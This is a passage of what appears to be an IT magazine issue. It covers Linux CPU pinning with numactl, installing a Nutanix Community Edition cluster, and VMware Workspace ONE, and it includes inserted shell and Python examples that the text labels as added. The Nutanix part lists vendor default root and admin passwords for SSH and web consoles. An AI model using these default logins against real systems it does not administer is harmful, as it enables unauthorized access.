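describe_cpulist() {
    for c in $(expand_cpulist "$1"); do
        sibs=$(siblings_of "$c")
        if [ "$(classify_cpu "$c" "$sibs")" = real ]; then
            echo "cpu$c real"
        else
            echo "cpu$c smt (sibling of cpu${sibs%%,*})"
        fi
    done
}

# check_affinity PID EXPECTED -> "ok" when the kernel's Cpus_allowed_list
# for PID covers exactly the CPUs in EXPECTED, else "mismatch (actual: ...)"
check_affinity() {
    actual=$(sed -n 's/^Cpus_allowed_list:[[:space:]]*//p' "/proc/$1/status")
    if [ "$(expand_cpulist "$actual")" = "$(expand_cpulist "$2")" ]; then
        echo ok
    else
        echo "mismatch (actual: $actual)"
    fi
}

# make_fake_sysfs DIR CORES: constructs a sample tree (not a real machine)
# modelled on the article's Threadripper, where cpuN pairs with cpu(N+CORES).
make_fake_sysfs() {
    i=0
    while [ "$i" -lt "$2" ]; do
        for c in "$i" $((i + $2)); do
            mkdir -p "$1/devices/system/cpu/cpu$c/topology"
            echo "$i,$((i + $2))" > "$1/devices/system/cpu/cpu$c/topology/thread_siblings_list"
        done
        i=$((i + 1))
    done
}
```

On a live system, `describe_cpulist 0-4,8-12` tells you whether a physcpubind list lands only on real cores, and `check_affinity "$pid" 2` confirms that the process bound with `--physcpubind=2` really carries that mask.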
Figure 2: Output of TACC show_affinity tool (used with permission from the GitHub repository owner).

To show the NUMA policy setting for the current process, use the --show (-s) option:

    $ numactl --show

Running this command on the sample system produces the output in Listing 6.

Listing 6: numactl --show

    $ numactl --show
    policy: default
    preferred node: current
    physcpubind: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63
    cpubind: 0
    nodebind: 0
    membind: 0

The output is fairly self-explanatory. The policy is default. The preferred NUMA node is the current one (this system only has one node). It then lists the physical cores (physcpubind) that are associated with the current node, the bound CPU cores (node 0), and to which node memory allocation is bound (again, node 0).

The next examples show some numactl options that define commonly used policies. The first example focuses on running a serial
application – in particular, running the application on CPU 2 (a non-SMT core) and allocating memory locally:

    $ numactl --physcpubind=2 --localalloc application.exe

The kernel scheduler will not move application.exe from core 2 and will allocate memory using the local node (node 0 for the sample system).

To give the kernel scheduler a bit more freedom, yet keep memory allocation local to provide the opportunity for maximum memory bandwidth, use:

    $ numactl --cpunodebind=0 --membind=0 application.exe

The kernel scheduler can move the process to CPU cores associated with node 0 while allocating memory on node 0. This policy helps the kernel adjust processes as it needs, without sacrificing memory performance too much. Personally, I find the kernel scheduler tends to move things around quite often, so I like binding my serial application to a specific core; then, the scheduler can put processes on other cores as needed, eliminating any latency in moving the processes around.

Tool for Monitoring CPU Affinity

Both taskset and numactl allow you to check on any core or memory bindings. However, sometimes they aren't enough, which creates an opportunity for new tools. A good affinity monitoring tool, show_affinity [9], comes from the Texas Advanced Computing Center (TACC).

The tool shows "… the core binding affinity of running processes/threads of the current user." The GitHub site has a simple, but long, output example from running the command (Figure 2).

Summary

Today's HPC nodes are complicated, with huge core counts, distributed caches, various memory connections, PCIe switches with connections to accelerators, and NICs, making it difficult to clearly understand where your processes are running and how they are interacting with the operating system. This understanding is extremely critical to getting the best possible performance, so you have HPC and not RAPC.

If you don't pay attention to where your code is running, the Linux process scheduler will move your processes around, introducing latency and reducing performance. The scheduler can move processes into non-optimal situations, where memory is used from a different part of the system, resulting in much-reduced memory bandwidth. It can also cause processes to communicate with NICs across PCIe switches and internal system connections, again resulting in increased latency and reduced bandwidth. This is also true for accelerators communicating with each other, with NICs, and with CPUs.

Fortunately, Linux provides a couple of tools that allow you to pin (also called binding or setting the affinity of) processes to specific cores along with specific directions on where to allocate memory. In this way, you can prevent the kernel process scheduler from moving the processes or at least control where the scheduler can move them. If you understand how the systems are laid out, you can use these tools to get the best possible performance from your application(s).

In this article, I briefly introduced two tools along with some very simple examples of how you might use them, primarily on serial applications.

Info
[1] Multichip Modules: [https://en.wikipedia.org/wiki/Multi-chip_module]
[2] Non-Uniform Memory Access (NUMA): [https://en.wikipedia.org/wiki/Non-uniform_memory_access]
[3] GkrellM: [http://gkrellm.srcbox.net/]
[4] "Processor Affinity for OpenMP and MPI" by Jeff Layton: [https://www.admin-magazine.com/HPC/Articles/Processor-Affinity-for-OpenMP-and-MPI]
[5] AMD Ryzen Threadripper: [https://www.amd.com/en/products/cpu/amd-ryzen-threadripper-3970x]
[6] First number in the output: [https://stackoverflow.com/questions/7274585/linux-find-out-hyper-threaded-core-id]
[7] Taskset command: [https://man7.org/linux/man-pages/man1/taskset.1.html]
[8] numactl: [https://linux.die.net/man/8/numactl]
[9] show_affinity: [https://github.com/TACC/show_affinity]

The Author
Jeff Layton has been in the HPC business for almost 25 years (starting when he was 4 years old). He can be found lounging around at a nearby Frys enjoying the coffee and waiting for sales.
CONTAINERS AND VIRTUALIZATION Nutanix Community Edition

Clustering with the Nutanix Community Edition

The Right Track

The free Community Edition of the Nutanix hyperconverged infrastructure, Nutanix on-premises cloud, is offered alongside its commercial product for those looking to take their first steps in the environment. By Günter Baumgart

To be clear, the Community Edition of Nutanix was developed for testing purposes only; it is not a replacement for the production version. The Community Edition does not give you all the possibilities that you have with the commercial version. For example, the Community Edition only supports two hypervisors: Acropolis (AHV) by Nutanix and ESXi by VMware. The basic setup of a private enterprise cloud from Nutanix built on the Community Edition includes the hypervisor, the Controller Virtual Machine (CVM) and associated cloud management system, the Prism Element for single-cluster management, and Prism Central for higher level multicluster management (Figure 1).

With the Community Edition, you can set up a one-, three-, or four-node cluster. All other conceivable cluster combinations are reserved exclusively for the commercial version. The individual components of the Community Edition, such as AHV; the AOS cloud operating system, which is based on the individual CVMs in the cluster; and the cloud management system, cannot be mixed with components of the production version. Therefore, you cannot manage a Community Edition cluster with Prism Central from the production version. Conversely, you cannot use Prism Central Community Edition to manage a production cluster.

If you want to use VMware's ESXi in the Community Edition as your hypervisor, also remember that you will then not be able to use the Nutanix Flow microsegmentation functionality because it can only be used in conjunction with AHV.

Figure 1: A schematic representation of the components of the management environment.

Everything's Connected

During the installation and subsequent testing of the Community
Edition, it can be quite useful to switch to the command line from time to time. To do this, you need to know how to find your way around the network and which module and service you can reach. Regardless of whether you are using AHV or ESXi, you always have at least two networks: an internal network that is not connected to a physical network adapter and an external network to which the existing physical adapters are connected. The internal network is used to support communication between the CVM and the hypervisor. The 192.168.5.0 network is used for this purpose.

The hypervisor always has the IP address 192.168.5.1 and the CVM the IP address 192.168.5.2, which means the installation process always creates two virtual bridges or virtual switches for each node in the cluster. If you use AHV, you will find virbr0 and br0 in the node, which for ESXi are vSwitchNutanix and vSwitch0.

You assign external IP addresses to the CVM and the hypervisor during the install. If you now want to access the console of the AHV, you can either address it on the external network or the internal network. The same applies to the console of the CVM: You can access the CVM console from the external or internal network (Figure 2).

Figure 2: Different approaches lead to the CVM and hypervisor consoles.

Table 1 provides an overview of the accounts you can use to access the system, including the root login name for accessing the console on the hypervisor and the nutanix login name for the CVM console, along with the matching password nutanix/4u, which you also need to log on to the respective consoles.

Table 1: Nutanix Usernames

    Component       Protocol            Username    Password
    Controller VM   SSH                 nutanix     nutanix/4u
    AHV             SSH                 root        nutanix/4u
    ESXi            SSH                 root        nutanix/4u
    Prism Element   HTTPS (port 9440)   admin       nutanix/4u
    Prism Central   HTTPS (port 9440)   admin       nutanix/4u

Installation Media

In the first step, you need to create an account with Nutanix [1] and register your email address by following the Get Access Today! link. After you have completed the registration process, you have a personal Nutanix account and are now authorized to log in to the portal [2].

On the Nutanix Community Portal site you will see the Download Nutanix Community Edition block. After clicking on this, the Community Edition download site pops up immediately, and you are treated to an initial overview of the binaries available to you there. At press time, version CE-2020.09.16 was available. Because a new production version was recently released (AOS LTS 5.20 and AOS STS 6.0), it can be assumed that a new Community version will soon follow.

To install the Community Edition (CE), you need to download the corresponding ISO file (CE-202y.mm.dd.iso). You can use this image to install the CVM and AHV on your nodes in a fully automated process. If you would rather use ESXi as the hypervisor in your Nutanix Lab cluster, you also need the image of the vSphere hypervisor (ESXi ISO).

If you want to install and set up Prism Central after your cluster has been installed and configured, you need the matching binary (i.e., the Prism Central Deployment file) in the form of a TAR archive and the Metadata for AOS upgrade and PC deploy/upgrade file as a ZIP file. In addition to the JSON files for upgrades, the latter also contains the ce-pc-deploy-202y.mm.dd-metadata.json file, which you need to install Prism Central.

Next, download the VirtIO drivers and, if you want to try out End User Computing (EUC) or Virtual Desktops (VDIs) on the Community Edition,
CO N TA I N E R S A N D V I RT UA L I Z AT I O N Nutanix Community Edition

the matching plugins. In the Documentation and Guides section on this site you will also find bundles of additional documentation on the Community Edition in the form of PDFs and video files.

Installation Preparation

You have now downloaded all the software you need. The question that remains is how to install the Community Edition: physically or virtually (i.e., in a nested setup)? You also need to decide whether you want a one-, three-, or four-node cluster. No matter what you ultimately decide, the installation procedure is always the same. In the first iteration I take a look at creating a one-node cluster lab based on the Community Edition with Nutanix AHV as the hypervisor, Prism Central for multicluster management, and an Intel NUC (Next Unit of Computing, a small-form-factor barebone computer) mini-PC as the hardware platform.

The NUC used in our lab is the NUC8 i7 BEH model. It comes with two 32GB DDR4-2666 SO-DIMMs (i.e., a total of 64GB of RAM). The computer has two disk drives – one 512GB and one 1TB SSD – and an eighth generation quad-core Intel Core i7 8559U processor running at 2.7GHz. Therefore, the machine is not totally up-to-date but is still perfectly adequate for the lab. If you do not have a machine like this at hand for your installation, use something with similar hardware, or if you are going for a nested setup in your lab, use something with similar specs for the VM.

IP Addresses for Larger Clusters

If you are more interested in installing a three- or four-node cluster, remember that you will need separate IP addresses for each individual hypervisor and CVM that resides on your cluster's nodes.

To avoid wasting time while installing your lab setup, you should have all the necessary information ready in advance: a DNS server, a default gateway, at least two Network Time Protocol (NTP) servers, and – if you want to connect your lab to Active Directory – access credentials. You also need an IP address from your lab network for the CVM, another for the one-node cluster itself, one in case you want to provide an iSCSI target with Nutanix volumes, another IP address (for the hypervisor, of course), and yet another IP address for Prism Central. (See the "IP Addresses for Larger Clusters" box.) Additionally, you need unique names for the Nutanix cluster and for Prism Central.

Creating a USB Installation Stick

To install the server, you need two USB sticks. One USB stick is used for the installation, and the second is used as an installation target or boot device. As far as the capacity of the sticks is concerned, 32GB will do nicely. To create a bootable USB stick, you can use the USB installer of your choice (e.g., Rufus [3]).

Now take the downloaded ce-2020.09.16.iso file and create a bootable USB CE installation stick with one of the two USB sticks (Figure 3). If you plan to install the Community Edition nested, this step is not necessary, of course, because you can mount the CE image directly on the virtual hardware. The second USB stick would not be necessary either because you can simply add another virtual disk with a capacity of 32GB as the installation target for the VM.

Figure 3: Generate a USB CE installation device with the ce-2020.09.16.iso file.

Setting up a Local Nutanix Cloud

After the preparatory work is done, you can move on to installing the Community Edition on the Intel NUC. Insert the two USB sticks into the corresponding server ports and switch the server on. You can now follow the installation process on the monitor connected to the NUC and, depending on the type of hardware you are using in your lab, the Nutanix Community Edition Installer configuration front end appears, sooner or later, where you set up your Nutanix one-node cluster.

First, select the hypervisor you want to use in your cluster. If you go for Nutanix AHV (Figure 4, step 1), you can continue directly with the disk assignments (Figure 4, step 2) because AHV is an integral part of the CE image. If you decide to use ESXi as your hypervisor, you need to provide your ESXi installation image over HTTP (e.g., in the form http://<webserver>/iso/esxi.iso). Because I am using AHV as the hypervisor for this workshop, I check AHV in the selection box in step 1.

You can now see all the storage devices found on the server. As you can see, sdd was selected as the USB installation target for the hypervisor, and the CVM will be installed on sda. In the fields selected in step 3, you now need to assign the address data for the hypervisor's external network. In step 4, you can enter the external address data for the controller virtual machine (VM), and in step 5, you are given the option of having the cluster created automatically by the installation process. This step is fine if you want to create a one-node cluster, but if you want to create a three-node cluster, for example, it might make more sense to create the cluster manually after successfully completing the installation of all the nodes by typing the following on the command line of a controller VM:


Figure 4: Entering the parameters for the cluster configuration.

    cluster -s <cvm_ip-1>,<cvm_ip-2>,<cvm_ip-3> [--redundancy_factor=2] create

You do not need to start the cluster when you are creating a new cluster; the cluster starts up automatically after creation. However, the reason you should not rely on this automation, but build the cluster retroactively, is that if the installation of just one node fails for some reason, you need to create the whole cluster again, and this is overhead you would like to avoid.

Once you have completed the entries and set up everything, click Next to be taken to the End User Licence Agreement (EULA). After accepting the terms of use, press Start and the installation begins. You can now follow the entire installation process onscreen from the console output. My entire installation and the subsequent startup of the service took a good 30 minutes with the hardware used in this example, which is actually quite quick if you consider that you are installing and configuring the complete Nutanix CE one-node hyperconverged infrastructure (HCI). Now remove the USB installation stick when the system prompts you to do so, and press Y at the console to reboot, and you can proceed to create the cluster. Because the option Create single-node cluster? was not selected for this installation, this is the next and final step after the restart. To use SSH to connect to the CVM and create the cluster, enter:

    ssh nutanix@<IP address of CVM>
    cluster -s <cvm_ip> create

You have to wait until the system has created the cluster and started up all the services. Again, some patience is required. To check the progress, type:

    cluster status

After all cluster processes have started up and you have seen a Success message in the output, log on to the Prism Element UI process of the CVM on https://<IP address of the CVM>:9440/. For the first login, use the admin account with the nutanix/4u password. The user interface now expects you to enter a new password. After doing so, log on again with the new password. In the next step, Prism Element then expects the NEXT account to be set up. The Prism Element splash page then appears.

Now click on the cogwheel (Settings) at the top in the right-hand corner of the user interface (UI) and select Network Configuration | Create Network to create a new network. I used vlan.0 for the network name and 0 as the VLAN ID.

You could now start installing your VMs on the platform. A short live demo introducing Prism Element can be found online [4]. For now, you should do some fine tuning such as assigning cluster names, cluster IP addresses, and the IP address for the iSCSI target Nutanix-Volumes. You can also do all of this at the command line (Table 2). More commands and scripts are located online [5], or simply enter ncli or acli at the command line of the CVM and press the Tab key to delve more deeply into the individual command references.

Next, click on the Unnamed item in the UI (Figure 5) and enter a name for your cluster and the corresponding IP addresses in the individual fields of the form. Once that's done, you can explore and use your cloud in your lab.

Table 2: Useful Commands

Function                      Command
Start the cluster             cluster start
Stop the cluster              cluster stop
Delete the cluster            cluster destroy
Display the cluster status    cluster status
Create a one-node cluster     cluster -s <CVM_IP_address> create
Enter a DNS server            cluster -dns_servers=<DNS-IP-1>,<DNS-IP-2> create
Enter an NTP server           cluster -ntp_servers=<NTP_server> create
Define the cluster name       cluster -cluster_name=<cluster_name> create
Assign the cluster IP address cluster -cluster_external_ip=<cluster_IP_address> create

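As an added example (not code from the article or from Nutanix), the following Python script checks a lab address plan against the rules stated above before any node is installed: every hypervisor, CVM, cluster, iSCSI data services and Prism Central address must be unique and inside the lab subnet, none may fall into the 192.168.5.0/24 range the installer reserves for CVM-to-hypervisor traffic, and a DNS server plus two NTP servers must be on hand. It then renders the cluster creation command from the text and the Table 2 commands with the plan's values; the subnet, hostnames and addresses are constructed sample values.

```python
"""Check a Nutanix CE lab address plan and render the cluster commands.

Added example, not from the article or from Nutanix. Addresses below are
constructed sample values for a lab in 10.0.10.0/24.
"""
import ipaddress
from dataclasses import dataclass

# Range the installer uses for the internal CVM <-> hypervisor link
# (192.168.5.1 hypervisor, 192.168.5.2 CVM); external addresses must avoid it.
INTERNAL_NET = ipaddress.ip_network("192.168.5.0/24")


@dataclass
class Node:
    name: str
    hypervisor_ip: str  # external address of AHV/ESXi (Figure 4, step 3)
    cvm_ip: str         # external address of the controller VM (step 4)


@dataclass
class LabPlan:
    lab_subnet: str
    gateway: str
    dns_servers: list
    ntp_servers: list
    nodes: list
    cluster_vip: str       # external cluster IP address
    data_services_ip: str  # iSCSI target for Nutanix Volumes
    prism_central_ip: str
    cluster_name: str = "ce-lab"


def _addresses(plan):
    """Every address the plan hands out, labelled for the problem report."""
    pairs = [("gateway", plan.gateway), ("cluster IP", plan.cluster_vip),
             ("data services IP", plan.data_services_ip),
             ("Prism Central IP", plan.prism_central_ip)]
    for n in plan.nodes:
        pairs.append((f"{n.name} hypervisor", n.hypervisor_ip))
        pairs.append((f"{n.name} CVM", n.cvm_ip))
    return pairs


def validate_plan(plan):
    """Return a list of problems; an empty list means the plan is usable."""
    problems = []
    subnet = ipaddress.ip_network(plan.lab_subnet, strict=True)
    seen = {}
    for label, raw in _addresses(plan):
        try:
            ip = ipaddress.ip_address(raw)
        except ValueError:
            problems.append(f"{label}: {raw!r} is not an IP address")
            continue
        if ip in INTERNAL_NET:
            problems.append(f"{label}: {ip} collides with the internal network {INTERNAL_NET}")
        if ip not in subnet:
            problems.append(f"{label}: {ip} is outside the lab subnet {subnet}")
        elif ip in (subnet.network_address, subnet.broadcast_address):
            problems.append(f"{label}: {ip} is the network or broadcast address")
        if ip in seen:
            problems.append(f"{label}: {ip} is already assigned to {seen[ip]}")
        seen.setdefault(ip, label)
    if len(plan.nodes) not in (1, 3, 4):
        problems.append("the article covers one-, three- and four-node clusters only")
    if not plan.dns_servers:
        problems.append("at least one DNS server is needed")
    if len(plan.ntp_servers) < 2:
        problems.append("at least two NTP servers are needed")
    return problems


def build_create_command(plan):
    """The manual creation command from the text, typed on a CVM."""
    cvms = ",".join(n.cvm_ip for n in plan.nodes)
    if len(plan.nodes) == 1:
        return f"cluster -s {cvms} create"
    return f"cluster -s {cvms} --redundancy_factor=2 create"


def build_followup_commands(plan):
    """The Table 2 commands with the plan's values filled in."""
    return [
        f"cluster -dns_servers={','.join(plan.dns_servers)} create",
        f"cluster -ntp_servers={','.join(plan.ntp_servers)} create",
        f"cluster -cluster_name={plan.cluster_name} create",
        f"cluster -cluster_external_ip={plan.cluster_vip} create",
    ]


# Constructed three-node plan that follows all the rules.
THREE_NODE_PLAN = LabPlan(
    lab_subnet="10.0.10.0/24", gateway="10.0.10.1",
    dns_servers=["10.0.10.2"], ntp_servers=["10.0.10.3", "10.0.10.4"],
    nodes=[Node("nuc1", "10.0.10.21", "10.0.10.22"),
           Node("nuc2", "10.0.10.23", "10.0.10.24"),
           Node("nuc3", "10.0.10.25", "10.0.10.26")],
    cluster_vip="10.0.10.30", data_services_ip="10.0.10.31",
    prism_central_ip="10.0.10.40")

# Constructed one-node plan with typical mistakes: the CVM was given an address
# from the reserved internal range, Prism Central reuses the cluster IP, and
# only one NTP server is listed.
BROKEN_PLAN = LabPlan(
    lab_subnet="10.0.10.0/24", gateway="10.0.10.1",
    dns_servers=["10.0.10.2"], ntp_servers=["10.0.10.3"],
    nodes=[Node("nuc1", "10.0.10.21", "192.168.5.22")],
    cluster_vip="10.0.10.30", data_services_ip="10.0.10.31",
    prism_central_ip="10.0.10.30")

if __name__ == "__main__":
    for plan in (THREE_NODE_PLAN, BROKEN_PLAN):
        issues = validate_plan(plan)
        print("problems:" if issues else "plan OK", issues)
        if not issues:
            print(build_create_command(plan))
            print("\n".join(build_followup_commands(plan)))
```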

Prism Central and Other Features

Now that you have reached this point of your installation, you have your first Nutanix test cluster. The creators of the Community Edition promise that new improvements are continually being incorporated into the test platform. You can check out its progress by updating the system through the Life Cycle Manager (LCM). Additional information on LCM can be found online [6], or simply go to the Prism Element UI and click on Home | LCM. You will then be guided by the system and provided the necessary information, such as the Nutanix knowledge base (KB) articles.

Once you have familiarized yourself with the platform and tested your own workloads extensively with the Community Edition, take the next step and test the other Nutanix products on your CE HCI cluster. First, install Prism Central, which is the basis for many other products. Deploying Prism Central requires only a few steps. To begin, log on to the Prism Element UI. Top left in the browser you will then see a box labeled Prism Central. To open a form where you can upload the Prism Central binaries ce-pc-deploy-2020.09.16-metadata.json and ce-pc-deploy-2020.09.16.tar that you previously downloaded from the CE Community site, click on Register or create new.

After the upload completes, click Install, then select whether you want a clustered installation and whether you want to roll out a LARGE or a SMALL environment. Next, enter the IP address, the gateway, and at least one DNS server and click on Deploy to roll out the Prism Central VM in the cluster. Once the installation process is complete, as shown by the task display in Prism Element, register your Prism Central with your NEXT account.

To do so, log on to your new Prism Central at https://<IP address Prism Central>:9440 with the admin account and nutanix/4u as the password. You will recall the initial login to the Prism Element: It's exactly the same procedure here. Now move on to the CE Cluster registration in Prism Central by going to your Prism Element (https://<IP address of CVM>:9440), clicking on Register or create new, and selecting Connect. Here, you enter the IP address, login name, and password of Prism Central and click on Connect; hey, presto, the cluster is registered (Figure 6).

Now that Prism Central is available, you can move on to test the scalable file server, the similarly scalable object store, or S3 storage from Nutanix, or you can take a closer look at the micro-segmentation solution, Flow. If you want to familiarize yourself with automating workloads or work processes, Calm is certainly a must for you, or you can go one step further and test Karbon.

Karbon lets you roll out complete Kubernetes clusters within the Nutanix platform in an automated process. If you are also interested in DIY automation, you have massive opportunities for programming with acli, ncli,

Figure 5: The main dashboard of Prism Element with the home site.

Figure 6: Cluster management is now possible in Prism Central.


the Nutanix REST API, or PowerShell, for which, of course, the corresponding Nutanix commandlets are also available. As you can see, you can get a huge amount of experience with the Nutanix Community Edition and gain insight into the manufacturer's solutions.

Startup and Shutdown

After the install, the cluster is running; however, you might want to shut it down and start it up again later. First, shut down all your workloads and Prism Central. If you are unable to initiate a shutdown from your workload itself, use the Prism Element UI under Home | VM, for example, to change the power state of a VM. Second, shut down the CVM by going to the CVM's command line and entering:

    cvm_shutdown

The CVM shuts down after you are automatically logged off. Third, go to the AHV's CLI and enter:

    poweroff

Wait until the NUC has been completely switched off by the system. To start up again, switch on the NUC and wait until you can access the Prism Element UI on https://<IP address of CVM>:9440. Depending on the hardware, this may take a few minutes.

Conclusions

If you want to set up a cluster without too much overhead, you will find it fairly easy to do with Nutanix Community Edition. This free version is primarily intended for testing the environment and exploring the platform. If you want to deploy the cluster in a production environment, you will need the full version, but both versions of Nutanix are easy to use and flexible.

Info

[1] Creating a Nutanix account: https://www.nutanix.com/products/register
[2] Nutanix portal: https://next.nutanix.com
[3] Rufus: https://rufus.ie/en/
[4] Overview of Prism Element: https://www.youtube.com/watch?v=zQkSKix3qWs
[5] Commands and scripts: https://portal.nutanix.com/page/documents/details?targetId=Command-Ref-AOS-v5_20
[6] Information on Life Cycle Manager: https://portal.nutanix.com/page/documents/details/?targetId=Life-Cycle-Manager-Guide-v2_4:Life-Cycle-Manager-Guide-v2_4
CO N TA I N E R S A N D V I RT UA L I Z AT I O N VMware Workspace ONE

Workspace ONE for endpoint management

Empowered

VMware Workspace ONE provides a secure and user-friendly digital workplace. We look at the features, components, and architecture of Workspace ONE, as well as application management and simplification of the integration of end devices through user self-enrollment. By Jens-Henrik Söldner

The trend is moving away from stationary and toward mobile workplaces. That said, it is still important for the IT department to manage all end devices efficiently. Because of all the different operating systems, a clear-cut tool for endpoint management is essential. VMware's Workspace ONE [1] aims to integrate all of a company's devices, including devices belonging to employees (bring-your-own-devices, BYODs), uniformly and centrally into the existing infrastructure with the help of a secure platform. The overriding goal is to organize application lifecycle management. The overall strategy is known as Unified Endpoint Management (UEM) and is one of the two core components of Workspace ONE.

In addition to UEM, the second core component, Workspace ONE Access, combines the administration of users and user groups, the assignment of access authorizations to the applications, and the setup and provisioning of virtual desktops with the respective applications in a catalog (Figure 1). The Access component provides a connector to other identity (ID) providers such as Ping, Okta, and Microsoft Azure, providing a common catalog interface for all applications.

Lead Image © Davorr, Fotolia.com

Figure 1: Managing user access with Workspace ONE Access involves various modules. Image courtesy VMware. [2]


Table 1: Workspace ONE Components

Component                                                                 Function
VMware Workspace ONE UEM                                                  Enterprise mobility management
VMware Workspace ONE Access                                               Identity platform
VMware Workspace ONE Intelligence                                         App analysis and automation
Workspace ONE App                                                         User access to apps
VMware Horizon                                                            Virtual desktops and remote desktop services (RDS)
VMware Workspace ONE Boxer                                                Secure email client
VMware Workspace ONE Browser                                              Secure web browser
VMware Workspace ONE Content                                              Mobile repository for content
VMware Workspace ONE Tunnel                                               App VPN access to enterprise resources
VMware AirWatch Cloud Connector and VMware Identity Manager Connector    Synchronization with enterprise directories
VMware Unified Access Gateway                                             Gateway for secure Edge services
VMware Workspace ONE Secure Email Gateway                                 Email proxy server
Certificate Authority Integration                                         Lifecycle management of provided certificates
VMware Email Notification Service                                         Email messaging for Workspace ONE Boxer on iOS

The AirWatch Cloud Connector, in turn, securely transmits requests from Workspace ONE UEM to the back-end infrastructure. Table 1 provides an overview of all components of Workspace ONE.

Architecture and Services

Administrators use Workspace ONE to define user groups, policy settings, and device configurations. Users then access their applications through Workspace ONE according to the defined settings and configurations. Figure 2 illustrates the interaction of the various components and interfaces in Workspace ONE.

Workspace ONE services are based on the integration of VMware Workspace ONE UEM, Workspace ONE Access, and VMware Horizon. Deployment can be achieved in a variety of configurations, including:

• On-premises deployment of Workspace ONE Access and Workspace ONE UEM.
• Cloud-based deployments of Workspace ONE Access and Workspace ONE UEM.
• Hybrid deployments with different components available either on-premises or in the cloud.

Basic EMM Features

As mentioned earlier, administrators can deploy, manage, and secure applications with Workspace ONE. In doing so, IT can leverage interfaces for diverse operating systems to configure mobile devices such as notebooks, smartphones, and tablets in line with corporate policies. Workspace ONE's UEM accesses enterprise mobile management (EMM) interfaces to provision, configure, and secure applications and devices. This level of control enables IT to implement a flexible BYOD program that lets users choose their devices.

In this context, EMM is an umbrella term for systems that manage mobile devices in the enterprise. It is subdivided into the following subareas:

• Mobile device management (MDM): Manages mobile devices

Figure 2: A schematic overview of Workspace ONE shows the interplay of the numerous components and interfaces. Image courtesy VMware. [3]


with software and hardware as specified by the enterprise.
• Mobile application management (MAM): Manages the software installed on mobile devices through an internal company app store.
• Mobile content management (MCM): Provisions the company's own applications and enables files and documents to be passed on to colleagues, business partners, and customers by the mobile route.

Profiles and Software Distribution

The use of device profiles changes the behavior of enrolled devices. Device profiles, combined with compliance policies, help enforce corporate rules and procedures. For example, Workspace ONE UEM device profiles can be created on the basis of criteria such as users, groups, platforms, and operating systems. You can also create smart groups, which are customizable groups that allow you to filter dynamically. User groups can control the assignment of access authorizations individually on the respective devices.

Workspace ONE UEM lets you create device-specific profiles for the individual operating systems. The functions are adjustable to suit requirements, which means you can activate or deactivate one or more functions, such as switching off the Siri voice assistant on Apple devices. However, profiles need to be set up categorically and in a granular way. This approach simplifies the management of individual profiles. As a result, they are not valid for all devices but, instead, are specifically for the selected operating system in the matching smart group. Device registration establishes the initial communication with Workspace ONE UEM to enable EMM.

Another component of UEM is data leakage protection. Examples of potential data leaks include saving work documents to a public storage device such as Dropbox or receiving work email with an unmanaged email client. Other security measures include encrypting and restricting email traffic, such as editing and sharing attached files. The company can also require that only applications provided by the enterprise are used instead of OS-native applications. The choice of browser can also be restricted for users to ensure secure browsing.

Workspace ONE lets you integrate existing ID providers, such as Microsoft's Active Directory or another LDAP-based directory, to implement user synchronization, authentication, and application access. Finally, the tool enables simplified software distribution. Deploying, updating, and deleting software packages can all be automated. Moreover, you can distribute the packages in predefined time windows and as a function of the network infrastructure load, and notifications for upcoming software updates let users prepare for them accordingly.

Provisioning an Application Catalog

A wizard that acts as a checklist guides you through the individual settings in the UEM console, step by step. The wizard is divided into four modules: Workspace ONE, Devices, Content, and Application. Each module contains instructions on how to achieve specific goals. Because some steps overlap in some modules, the wizard tracks progress across all four modules, ensuring that the same step never needs to be performed twice.

Workspace ONE provides users with access to cloud, mobile, Mac, and Windows applications through the unified Intelligent Hub application catalog, which includes applications for deployment in the main Workspace ONE Access and Workspace ONE UEM components. Therefore, when configuring Intelligent Hub, you need to connect Workspace ONE UEM with Workspace ONE Access. Table 2 shows which type of deployment Workspace ONE provides for each operating system. In addition to the application types in Table 2, supported applications also include VMware ThinApp, VMware Horizon 7, VMware Horizon Cloud Service, and applications published by Citrix. Furthermore, the catalog supports virtualized desktops.

Table 2: Deployment Types by Operating System

Platform/Application    Internal   Public   Web   Purchased
iOS                     √          √        √     √
macOS                   √          –        √     √
Android                 √          √        √     –
Google Chromebook       –          –        √     –
Windows Phone           √          √        –     –
Windows Desktop         √          √        √     –

SSO and Two-Factor Authentication

Users install the Workspace ONE app on a mobile device and gain single sign-on (SSO) access to enterprise, cloud, and mobile apps with their corporate credentials. The Workspace ONE application leverages native operating system features to protect application access (e.g., biometric fingerprint readers on Android, Touch ID on iOS, and Windows Hello on Windows 10).

Mobile SSO establishes trust between the user, device, application, and enterprise and enables one-touch mobile application logins. To protect more sensitive applications, you can enable biometric or other multifactor authentication methods. Mobile SSO is available for Android, iOS, and Windows 10 devices.

In combination with the VMware Verify mobile app, strong, multifactor authentication is also possible, simplifying access across devices. When a user attempts to access the Workspace ONE application store or any other application that requires strong authentication, Verify sends a notification to the user's cell phone, which provides additional security for applications that do not inherently offer multilevel authentication.

For authentication, Workspace ONE provides multiple options to configure network-, platform-, and


application-specific criteria. Once it has been configured and security rules have been created, compliance with security rules is mandatory. On the device, access to applications is not allowed until the security rules are accepted and proof of compliance is maintained. Compliance rules protect against rooted devices or devices with jailbreak. These rules can also be used to allow or prohibit applications.

Adaptive Management

With adaptive management, users do not log their devices into Workspace ONE UEM to access apps that require only a basic level of security. Instead, users download the Workspace ONE mobile app from the appropriate app store and log in with their credentials. From here, they can access their authorized applications. For apps that require a higher level of security, user access may only be possible after device registration.

According to the assigned device profile, the catalog displays all authorized mobile, software as a service (SaaS), virtual, and desktop applications. Applications that require re-registration are marked with a lock icon. When users try to download software with this icon, a registration process begins. For example, users could obtain a conferencing application such as WebEx without registering. However, downloading enterprise applications such as Salesforce requires registration.

Secure Integration with the Enterprise Network

Workspace ONE UEM leverages the company's existing network infrastructure to provide its own high availability, redundancy, and scalability for the applications and desktops that are ultimately delivered to end users. To this end, local load balancing is integrated on the back end of the SaaS environment. The backbone security infrastructure includes redundant Ethernet switches, LAN separation, firewalls, intrusion detection, and monitoring. Redundant firewalls are located between the Internet and the AirWatch environment. An intrusion detection system (IDS) monitors all internal network traffic, logs it, and sounds the alert when suspicious network activity is detected. Other security features include:

• isolation of all Workspace ONE UEM web servers with a demilitarized zone (DMZ),
• antivirus clients to protect all servers, and
• spam filtering and spam reporting for email.

